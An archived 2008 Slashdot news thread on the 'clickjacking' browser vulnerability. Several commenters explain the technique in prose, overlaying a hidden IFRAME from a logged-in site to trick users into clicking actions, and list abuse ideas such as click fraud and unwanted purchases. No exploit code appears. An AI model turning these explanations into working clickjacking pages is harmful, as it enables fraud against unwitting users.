Want to read Slashdot from your mobile device? Point it at m.slashdot.org and keep reading!

 



Forgot your password?
typodupeerror
×
Bug Internet Explorer Mozilla Security The Internet

Alarm Raised For "Clickjacking" Browser Exploit 308

Shipment Date writes "ZDNet's Zero Day blog has some new information on what looks like a scary new browser exploit/threat affecting all the major desktop platforms — Microsoft Internet Explorer, Mozilla Firefox, Apple Safari, Opera and Adobe Flash. The threat, called Clickjacking, was to be discussed at the OWASP conference but was nixed at the last minute at hte request of affected vendors. From the article: 'In a nutshell, it's when you visit a malicious website and the attacker is able to take control of the links that your browser visits. The problem affects all of the different browsers except something like lynx. The issue has nothing to do with JavaScript so turning JavaScript off in your browser will not help you.'"
This discussion has been archived. No new comments can be posted.

Alarm Raised For "Clickjacking" Browser Exploit

Comments Filter:
  • by Anonymous Coward on Thursday September 25, 2008 @03:21PM (#25156655)

    *crickets*

  • Go Lynx! (Score:2, Funny)

    by ag3ntugly ( 636404 ) *
    I knew there was a reason I liked lynx
  • by Anonymous Coward on Thursday September 25, 2008 @03:23PM (#25156705)
    was some weird mouse-mastubation scenario. *shudders*
    • Re: (Score:3, Funny)

      by couchslug ( 175151 )

      "The first thing I thought of was some weird mouse-mastubation scenario."

      "Mastubation"?? I'm picturing small rodents with catheters....

      Even my capybara Lemmiwinks thinks THAT is sick.

    • was some weird mouse-mastubation scenario. *shudders*

      "Mousturbation"? Ok, I'll shut up now.

  • Turn to Lynx? (Score:2, Insightful)

    Well, they can't steals clicks from a browser without clicks
  • Information (Score:5, Insightful)

    by asCii88 ( 1017788 ) on Thursday September 25, 2008 @03:24PM (#25156725) Homepage
    You call this "information"? It's not even clear what the exploit is about.
    • by eln ( 21727 ) on Thursday September 25, 2008 @03:32PM (#25156883)

      It's very similar to the DNS issue from a couple of months back: It's a hugely scary thing that will doom the Internet, but because we're responsible we can't tell you what it is in any detail. However, if you don't patch your browser immediately (patch not yet available), you are fucked.

      Have a nice day.

      • by Kaptainkid ( 1366757 ) on Thursday September 25, 2008 @03:58PM (#25157355)
        For additional support information. Click this link. LOL
      • Re:Information (Score:5, Insightful)

        by OriginalArlen ( 726444 ) on Thursday September 25, 2008 @04:04PM (#25157441)

        There's a big difference. The first public news of the Kaminsky DNS issue was with the release of Microsoft's Patch Tuesday DNS update, with simultaneous patches from ISC for BIND and the other affects nameservers. Dan organised all that with the help of CERT and the DNS server vendor/distributors, without leaks. Once the patches and a vague description was out, people put two and two together pretty quickly - IIRC from the BlackHat preso, the first correct solution Kaminsky received was within 48 hours - and shrewd guesses were being made within two weeks (followed by the unfortunate leak which broadly confirmed the guess.) It sounds like the cat is well and truly out of the bag here, already, and there are no patches yet. Apart from the people at the conference, there's enough detail in the sources the ZDNet blog links to to make it pretty clear which direction the shrewd guesses (and testing) will have started on.

        Looking on the bright side, more browsers than nameservers auto-update themselves...

        (Incidentally the reason the Internet wasn't destroyed by the Kaminsky bug was precisely because of all the prior coordination and then unequivocal "patch now" messages from multiple credible sources (CERT, Vixie, Microsoft, the other respected researchers Dan explained it to under NDA, etc.) And anyway you ARE still fucked in the long run, anyway, because DNS is still spoofable by a determined attacker (which probably means one who's going after a very high value target) in the absence of DNSSEC. Hence the (by Fed terms, frantic) haste with which the .gov root is being signed at last.

        Have a great day!

      • Re: (Score:3, Funny)

        by Hatta ( 162192 )

        Sounds like our economy right about now.

      • Re: (Score:3, Interesting)

        by Mad Merlin ( 837387 )

        But here's the best part (from the article):

        The issue has nothing to do with JavaScript so turning JavaScript off in your browser will not help you.

        Ebay, for example, would be vulnerable to this since you could embed javascript into the web page, although, javascript is not required to exploit this.

        In the meantime, the only fix is to disable browser scripting and plugins. We realize this doesnt give people much technical detail to go on, but its the best we can do right now.

        So, the exploit has nothing to do

        • Re: (Score:3, Interesting)

          by enoz ( 1181117 )

          I would have classed that article as FUD, except that there are too many obvious contradictions.

          Instead it just looks like some incoherent disinformation from someone who does not know the difference between a browser and a plugin.

          a scary new browser exploit/threat affecting all the major desktop platforms - Microsoft Internet Explorer, Mozilla Firefox, Apple Safari, Opera and Adobe Flash.

          That's where I stopped taking the article seriously. Unfortunately that was also the first paragraph.

    • Re:Information (Score:5, Informative)

      by AKAImBatman ( 238306 ) * <[moc.liamg] [ta] [namtabmiaka]> on Thursday September 25, 2008 @03:45PM (#25157129) Homepage Journal

      It's about using IFRAMES + CSS to make confusing visual elements that cause users to perform actions they didn't think they were performing. Feel better? ;-)

      • by HikingStick ( 878216 ) <`moc.liamtoh' `ta' `remeir10z'> on Thursday September 25, 2008 @04:01PM (#25157393)
        You mean like the way the new Slashdot interface causes a lot of the comments to overlap, so you think you're clicking on that +3 Interesting one and you end up clicking a -1 Troll on the RNC veep candidate in a bikini...except much worse, I mean.
      • by lysergic.acid ( 845423 ) on Thursday September 25, 2008 @04:12PM (#25157545) Homepage
        i still don't get it. could you give an analogy involving cars?
        • Re:Information (Score:5, Insightful)

          by AKAImBatman ( 238306 ) * <[moc.liamg] [ta] [namtabmiaka]> on Thursday September 25, 2008 @04:22PM (#25157713) Homepage Journal

          Sure. Imagine you're in a car showroom looking at a super-expensive car. It looks great and price is pretty good. So you tell the dealer you'll take the car. Except when you get in the car, you realize that someone had put a cardboard cutout in front of the car. The car you got in was actually an economy vehicle. Except now it's too late to undo your purchase!

          Here's another one: Let's say you've got a bunch of buttons on your dash. Most of them control the radio, but one controls the ejection seat. While you're away, some neighbor kids from MIT think it's funny to come over and rewire the buttons on your radio. Now when you press the button to turn on your radio, you actually get ejected from the car. NOT FUNNY!

          Better? :-P

        • How about this: Your name is Heather and you're trapped in Silent Hill. After beating the crap out of a monster, you realize that all the spooky playground was some CSS delusion and you ended up screwing innocent ppls' lives.

          That would've been a pretty cool ending for SH3, btw, but I hope it helps explaining what this exploit really is about. So, in other words,
          if you see a flash ad saying "click to win a prize", now you can know what the prize is ;-)

    • Re: (Score:3, Funny)

      by AaxelB ( 1034884 )
      And, suspicously, TFA itself is hidden behind a link! Do they really expect us to click it??

      ...I did click it. What a useless article.

      It's a fundamental flaw with the way your browser works and cannot be fixed with a simple patch.

      Oh no! There's nothing we can do!

      In the meantime, the only fix is to disable browser scripting and plugins.

      Uh... wha? I thought it didn't have to do with browser scripting and plugins?

      So it's big and scary and you can't protect against it, except by taking basic precautions to protect yourself against it. I see.

    • by cmacb ( 547347 )

      Researchers are beginning to raise an alarm for what looks like a scary new browser exploit/threat affecting all the major desktop platforms -- Microsoft Internet Explorer, Mozilla Firefox, Apple Safari, Opera and Adobe Flash.

      Obviously the word "platform" is hot in media circles these days.

      I noticed Linux isn't in there. Does that mean Linux is not a platform? If I run Firefox on Linux am I safe? If I run Firefox on OS X am I safe?

      This is one reason I don't follow the news on ZDnet any more.

  • by null etc. ( 524767 ) on Thursday September 25, 2008 @03:24PM (#25156729)
    Oh great. Expect a resurgence in rickrolls. No one can protect you!
  • FF 3.0.2 safe? (Score:2, Informative)

    by DavidR1991 ( 1047748 )
    Fairly certain this is one of the listed fixes for 3.0.2, but I could be wrong (Or is this _another_ kind of clickjacking flaw?)
  • Summary wrong (Score:5, Informative)

    by mazarin5 ( 309432 ) on Thursday September 25, 2008 @03:25PM (#25156769) Journal

    The issue has nothing to do with JavaScript so turning JavaScript off in your browser will not help you.'

    The quote from the article says you can protect yourself by disabling scripting:

    In the meantime, the only fix is to disable browser scripting and plugins. We realize this doesnâ(TM)t give people much technical detail to go on, but itâ(TM)s the best we can do right now.

    • Re:Summary wrong (Score:5, Informative)

      by Free the Cowards ( 1280296 ) on Thursday September 25, 2008 @03:28PM (#25156813)

      The first quote is also from the article, so it's not the summary's fault. The article is vague and self-contradictory, so I'm calling bullshit until and unless further details are given.

      • Probably just some asshole trying to make some word popular so later when the people they're trying to impress say it in conversation, they can go "Yeah?! Clickjacking! Did you know I came up with that word!?"

      • Re:Summary wrong (Score:5, Informative)

        by jesser ( 77961 ) on Thursday September 25, 2008 @03:38PM (#25157003) Homepage Journal

        The zdnet article is pretty vague, but I think it refers to the problem detailed in this message from Michal Zalewski [whatwg.org]:

        "A malicious page in domain A may create an IFRAME pointing to an application in domain B, to which the user is currently authenticated with cookies. The top-level page may then cover portions of the IFRAME with other visual elements to seamlessly hide everything but a single UI button in domain B, such as 'delete all items', 'click to add Bob as a friend', etc. It may then provide own, misleading UI that implies that the button serves a different purpose and is a part of site A, inviting the user to click it."

        Disabling JavaScript won't prevent the attack. It will break some mitigations, though!

        • Re:Summary wrong (Score:5, Interesting)

          by jesser ( 77961 ) on Thursday September 25, 2008 @03:46PM (#25157139) Homepage Journal

          FWIW, this isn't exactly a new idea. roc and I discussed it back in 2002 [mozilla.org].

          I'm glad it's getting attention now, though. Any fix is likely to require changes to specs.

        • Re: (Score:2, Informative)

          by hvm2hvm ( 1208954 )
          If that's the case, then all you have to do is look at the address bar and see if you really are on the site you are seeing. If you click on a link and find yourself looking at your page on a social network while the address says "spam.dyndns.com" you should realize something is wrong.
          • by kesuki ( 321456 )

            and what do you do when it's a highly page ranked, 'google' shopping store, that is actually a phishing site on a 'build a estore site' that transfers your data to a legitimate store and simultaneously harvests your cc data to sell on the black market?

            hrm smarty pants what do you do then. happened to me, buying a cell phone data cable on the internet instead of in store where they charge triple the value of a data transfer cable...

            those 'build a estore' sites all look like legit domains... and on the surfa

            • Re: (Score:3, Informative)

              What you do is you see an unknown charge on your credit card, call the company, cancel the card, and get a new one. Total cost to you: 15 minutes and zero dollars.

              Honestly, why are people so afraid of having their credit card numbers stolen? Unless you're utterly negligent and don't report fraudulent purchases, you have no liability!

              • Re: (Score:3, Informative)

                by anotherone ( 132088 )

                Actually under certain circumstances you could be liable for up to $50, but yeah usually it's not a big deal.

                • Re: (Score:3, Informative)

                  I'm pretty sure that's only if your actual signature is on a receipt somewhere, which is fairly difficult to arrange when your number gets stolen over the internet.

          • But by that time, the damage is done. Suppose the link you clicked was a "Delete my account" button, for example. Also, the parent window should still be covering most of the iframe, so the only part of the site you'd see is the small box where the link was.
        • Comment removed based on user account deletion
        • by HTH NE1 ( 675604 )

          I've wanted to know when an iframe is embedded in my page and where it comes from so I can evaluate whether I can trust it, especially since my credit card company's website decided to embed the login form inside such an iframe. Further, if I attempt to Show Only This Frame on the iframe, the site redirects me to an error page.

          Putting iframe[src]:before { content: attr(src); } in my userContent.css has not worked, though a[name]:before { content: "[#] "; } a[name]:active:before { content: "[#" attr(name) "

      • Re:Summary wrong (Score:5, Informative)

        by sootman ( 158191 ) on Thursday September 25, 2008 @03:46PM (#25157153) Homepage Journal

        +1 for "vague and self-contradictory."

        From TFA: "The issue has nothing to do with JavaScript so turning JavaScript off in your browser will not help you." and then "The exploit requires DHTML." As far as I know, DHTML requires a client-side scripting language--the most popular of which (only?) is JavaScript.

    • Re:Summary wrong (Score:5, Informative)

      by kesuki ( 321456 ) on Thursday September 25, 2008 @03:38PM (#25157013) Journal

      the problem is actually in dhtml, but javascript makes the exploit 'much easier'

      hence, the attack sites will all be using javascript, because it's easier than writing it entirely in dhtml just to score and extra 1 click from the guy who disabled javascript because he doesn't trust it.

      BTW: in theory even sites like slashdot can be infected because the attack applies to all CSS coded sites. nice.

      oh, BTW, is you have noscript installed, this vulnerability can only force clicks within the same domain, since cross site code is automatically disabled.. AFAIK the only way to disable CSS is to use obsolete browses like lynx.

  • by Anonymous Coward on Thursday September 25, 2008 @03:25PM (#25156773)
    Finally I have a legitimate excuse for all the pr0n sites that are in my browser history. No honey, it isn't me, it's a browsers exploit! I swear!
    • by Roberticus ( 1237374 ) on Thursday September 25, 2008 @03:47PM (#25157159)

      Finally I have a legitimate excuse for all the pr0n sites that are in my browser history. No honey, it isn't me, it's a browsers exploit! I swear!

      I don't know how things work for you, but saying that I just got clickjacked is only going to get me into more trouble, not less.

  • Bullshit? (Score:5, Insightful)

    by sakdoctor ( 1087155 ) on Thursday September 25, 2008 @03:26PM (#25156779) Homepage

    I don't think this exploit really exists. A cross browser cross platform exploit that doesn't use javascript?
    Won't be losing any sleep over this one.

  • Premature claim (Score:5, Interesting)

    by clang_jangle ( 975789 ) * on Thursday September 25, 2008 @03:29PM (#25156829) Journal

    scary new browser exploit/threat affecting all the major desktop platforms

    I didn't find that information in TFA or in any of the TFAs linked in TFA (here [adobe.com] here [ckers.org] here [blogspot.com] here [webadminblog.com]). Though it may be so; it sounds like this exploit makes use of the browser's access to the clipboard.
    Elinks FTW!

  • From reading TFA (I know, silly me) this seems to be pretty much fear-mongering with a fancy new buzzword. "Clickjacking" oooo scary!

    Until some real technical details come up I'd say nothing to see here, move along.
  • OWASP (Score:5, Interesting)

    by Lord Ender ( 156273 ) on Thursday September 25, 2008 @03:32PM (#25156881) Homepage

    was to be discussed at the OWASP conference but was nixed at the last minute at hte request of affected vendors

    Well, add OWASP to the list of security organizations with no integrity. It's clear they care about their sponsors, not their members.

    • Re: (Score:2, Informative)

      by skis ( 920891 )
      Actually, the presenters were the ones that made that decision.

      So, after much deliberation we opted to pull our speech voluntarily, due to the extremely neutered information we'd have to be sharing. We'd much rather share the full breadth of what we found when it can be discussed more openly as to not diminish the danger of the flaw by only talking about small parts of the issue.
      -from ha.ckers.org
  • FTA: "The issue has nothing to do with JavaScript...", "Javascript is not required to exploit this....", "The exploit requires DHTML." Anyone care to educate me on these seemingly contradictory statements? (and yes, I know DHTML could utilize a different, non-JS scripting language). What else is DHTML but HTML, scripts that run in the browser's scripting engine, and CSS?

  • by big whiffer ( 906132 ) on Thursday September 25, 2008 @03:33PM (#25156907) Homepage
    i didn't even click on this story; someone must want me to read this...
  • by Tackhead ( 54550 ) on Thursday September 25, 2008 @03:34PM (#25156925)

    Microsoft Internet Explorer, Mozilla Firefox, Apple Safari, Opera and Adobe Flash.

    Web browser, Web browser, Web browser, Web browser, and cross-platform method for running code delivered from untrusted sources.

    From TFA:

    "The threat, called Clickjacking, was to be discussed at the OWASP NYC AppSec 2008 Conference but, at the request of Adobe and other affected vendors, the talk was nixed until a comprehensive fix is ready."

    One vendor is, unlike the others, mentioned by name. It happens to be the vendor that ships The One Thing That Is Not Like The Others.

    Also from TFA:

    "According to someone who attended the semi-restricted OWASP presentation, the issue is indeed zero-day, affects all the different browsers and has nothing to do with JavaScript:"

    and

    "In the meantime, the only fix is to disable browser scripting and plugins. We realize this doesn't give people much technical detail to go on, but itâ(TM)s the best we can do right now."

    Now we're at a quandary. Your humble correspondent is at a loss to even speculate as to the nature of a technology that Ffirstly isn't Javashit, but which can conceivably be invoked by web content regardless of which web browser is in use, but lastly can be secured against by disabling hated plug-ins.

    • Mod it up, boys.
    • by Chysn ( 898420 ) on Thursday September 25, 2008 @03:41PM (#25157065)

      > Now we're at a quandary. Your humble
      > correspondent is at a loss to even speculate as
      > to the nature of a technology that Ffirstly isn't
      > Javashit, but which can conceivably be invoked by
      > web content regardless of which web browser is in
      > use, but lastly can be secured against by
      > disabling hated plug-ins.

      It's a Flash exploit. I found a proof-of-concept by clicking around TFA, and it promised that the Flash movie would take over my clipboard, forcing me to close the browser window. I'm on Firefox 3.0.2, and the "proof-of-concept" did nothing.

      At least nothing obvious. I suppose I could have been rootkitted.

      • Oh, do you think so?

        (sorry ;)

        Firstly lastly hated plug-ins.

      • by stevied ( 169 )

        I'm not sure the clipboard hijacking is anything to do with this new 'clickjacking' issue - it came up about a month ago, I'm fairly sure it was on slashdot at the time.

        I'm really not sure what that link ("SEE: Adobe Flash ads launching clipboard hijack attack") is doing in the middle of the ZDNet post.

    • ...the lack of Flash support in Mobile Safari is now a security feature!
  • by rwa2 ( 4391 ) * on Thursday September 25, 2008 @03:40PM (#25157041) Homepage Journal

    Using the links browser in a terminal with mouse support is almost exactly like using a browser with images turned off...

    Witness:
    http://www.jikos.cz/~mikulas/links/screenshots/png.html [jikos.cz]

  • ok - i read TFA, scanned all the links blogs, their trackbacks and comments and from what i've seen there is no real info on what this is. Thinking about it for 2 minutes I had this idea that this will be best chance ever to get rid of IE6. My hope is that all the browser vendors (including MS) have conspired that maybe 3 weeks of making scary "clickjacking" news and pushing them to the main media outlets will eventually raise awareness to let go of that horrible thing that's keeping the web from really evo
  • Scary? (Score:5, Insightful)

    by pyrr ( 1170465 ) on Thursday September 25, 2008 @03:45PM (#25157123)

    I'm trying to think of the ways this could be used to cause harm, so far the biggest threat I see is to the pay-per-click ad model, since this would be great for clickfraud. Other than that, a website could bounce you to another page on their site that you didn't intend to go to, and possibly overwhelm your browser & bandwidth with a redirect loop. I can see a hint of an issue in the way frames might be used with this exploit and 3rd-party sites (as noted in the article), but that seems to be a bit of a stretch since the original site would still be sending someone away from their site in another redirect. Plenty of sites who make the choice to be annoying already make you go through a little effort to break out of their frames when you go to an external site from one of their links, it's not the end of the world.

    I'd like to hear other folks' ideas on ways this may be used for an exploit that could do damage to anything other than Google's bottom-line. Until I hear a more compelling one, this exploit doesn't strike me as being the least bit "scary". A "small potential nuisance" might be a more apt description, since it would be fairly simple for end users to just ignore its effects.

    • Re: (Score:3, Interesting)

      by Nathanbp ( 599369 )

      How about if a malicious site puts amazon.com in a iframe positioned so as to induce you to hit the 1-click order button on some expensive camera or something? Using an Amazon referral link to themselves, of course.

    • Re: (Score:3, Interesting)

      by ThreeGigs ( 239452 )

      It apparently doesn't have to redirect you away from the 'main' page you're seeing. It can all happen in a 'hidden' iFrame.

      I can think of a lot of web pages where clicking could have a real effect. Especially on sites where users keep themselves logged in. It appears as if they can direct your click to any spot or object on the 3rd party site.

      Ready to DIGG a story you know nothing about?
      Bid on an eBay auction?
      Delete all your old Yahoo/Gmail messages?
      What about any site that uses GETs to send a message to th

  • by RockMFR ( 1022315 ) on Thursday September 25, 2008 @03:45PM (#25157133)
    Details at 11.
  • by Skapare ( 16644 ) on Thursday September 25, 2008 @03:55PM (#25157317) Homepage

    I've seen situations that otherwise look like benign layout bugs, where two or more hyperlinks or other clickable objects end up being overlayed on each other. It's not clear which one would be activated until you click. If someone intentionally did this AND obscured the object they wanted the victim to click, and made the other object more attractive, people might be doing such clicking. This could be easily done with CSS on one page, but there's not advantage since both links are just part of the same page. I don't think frames would do this. However, IFRAMES might do this on a cross "page" basis. The perp makes an attractive link that overlays over an iframe that is loaded from another page, so the act of clicking gets the victim to effective click on the other page. This loads something else in the iframe, but from the perpective of that other web site, it was a click on their page (based on the referer value). The simple exploit would get people to click on an ad, and it would not be visible to the ad vendor which page was doing the exploit.

  • My take (Score:5, Informative)

    by Spy der Mann ( 805235 ) <.spydermann.slashdot. .at. .gmail.com.> on Thursday September 25, 2008 @04:05PM (#25157455) Homepage Journal

    From google cache:

    Clickjacking

    Thereâ(TM)s been a bit of drama over the last week or so around the upcoming world OWASP conference in New York. Itâ(TM)s surrounding a talk that Jeremiah and I were planning on doing the first day of the conference. Jeremiah and I have been working on some interesting browser security issues which also effect a lot of downstream people/websites/technologies as well. Sounds like a good talk right? We thought so too!

    Alas, it turns out that some of the issues we found werenâ(TM)t just a little bad - they were a lot bad. So bad, in fact, that we felt compelled to do some responsible disclosure. One issue lead into another issue into another and poof - we have at least two and probably more incoming vendor patches at a yet to-be-determined date. And weâ(TM)ve only worked with a few vendors. So⦠yah. Itâ(TM)s pretty bad.

    As you may have guessed the first is a browser company, Microsoft (to be expected since itâ(TM)s a browser issue to begin with). The second is Adobe - who have been working closely with us on this one since we first told them about the problem. We have been working on proof of concept code since before Blackhat and finally got our ducks in a row with real working exploit code a few weeks ago. And that is pretty much when the problems started. None of the issues we found relating to the browser were particularly easy to fix, it turns out.

    The related issues we found that affect websites (instead of browsers) is thankfully slightly easier to deal with on a one off basis, but that too is going to be a problem. There are a lot of much easier hacks out there against websites for sure, but what weâ(TM)ve been working on breaks some previously good security measures. The correct solve will not be patching every web-site on earth. Instead it will likely end up being a browser patch against every major browser. The idea of every webmaster in the world patching their own sites is a non-starter. Although Iâ(TM)m sure lots of people are going to run out and patch their sites rather than wait for the normal browser patch and release cycle for all browsers everywhere. Weâ(TM)ve discussed the high level concern with both Microsoft and Mozilla and they concur independently that this is a tough problem with no easy solve in sight at the moment.

    So, after much deliberation we opted to pull our speech voluntarily, due to the extremely neutered information weâ(TM)d have to be sharing. Weâ(TM)d much rather share the full breadth of what we found when it can be discussed more openly as to not diminish the danger of the flaw by only talking about small parts of the issue. There will still be holes in many websites due to this problem even after the short term patches are available, but weâ(TM)d rather a few of the more critical problems get patched before we go public.

    However, I must stress, this is not an evil âoethe man is trying to keep us hackers downâ situation, a la Michael Lynn vs. Cisco, or Chris Paget vs. HID, or MIT vs. MBTA and so on. We proactively decided it was better to pull the speech ourselves for the time being and for anyone who was looking forward to the speech all I can say is I hope to make it up to you once the vendors are in a better spot. It wasnâ(TM)t an easy decision but it really feels like the best option we have given the current situation. If youâ(TM)re desperate for a way to patch your browser from the issue disable scripting and plugins for the time being. More to come.

    This entry was posted on Monday, September 15th, 2008 at 5:36 pm and is filed under Webappsec. You can leave a response as well.

    And from the Adobe report:

    Thanks to Jeremiah Grossman and Robert "RSnake" Hansen

    Robert âoeRSnakeâ Hansen and Jeremiah Grossman recently shared with us some information they were planning to include in an upcoming presentation at the OWASP NYC AppSec confer

    • Errata (Score:3, Interesting)

      After reading AKAImBatman's comment [slashdot.org], I realized it's not a DOM/scripting vulnerability, but just the ability to hide a link behind flash or an animated GIF content.

      Kudos to AKAImBatman for understanding what this was about - and Kudos to the hackers for both discovering such an ingenious exploit and for working with the companies to fix it.

  • by Ambush Commander ( 871525 ) on Thursday September 25, 2008 @04:17PM (#25157615)

    In its most primitive form, it basically involves taking an iframe, figuring out where the link part/form part is, and then tricking the user into clicking it.

    This seems very clunky and hacky, but I suspect that the speakers at the OWASP talk have gotten this technique to work well enough so that it is both transparent and highly effective. Can you think of a website that needs you to click, say, a play button in order to view content? That click may be hijacked through an invisible iframe to execute an action on another website.

    The good folks at Google recently raised this topic on the WHATWG mailing list, you can read more about it here: http://lists.whatwg.org/pipermail/whatwg-whatwg.org/2008-September/016284.html [whatwg.org]

  • "In the meantime, the only fix is to disable browser scripting and plugins. We realize this doesn't give people much technical detail to go on, but it's the best we can do right now. "

    What's one malicious/annoying script from another? I turned them all off, years ago, and magically problems with trojans, annoying popups, and flashy/dodgy adverts all went away.

    At work, I put CNN on my restricted sites list to explicitly prohibit the site from running scripts. I'll take my biased news without the long page

  • From a comment [zdnet.com] on TFA:

    NoScript in its default configuration can defeat most of the possible attack scenarios (i.e. the most practical, effective and dangerous): see this comment by Jeremiah himself: http://ha.ckers.org/blog/20080915/clickjacking/#comment-84820 [ckers.org]. ...

Real Programmers don't eat quiche. They eat Twinkies and Szechwan food.

Working...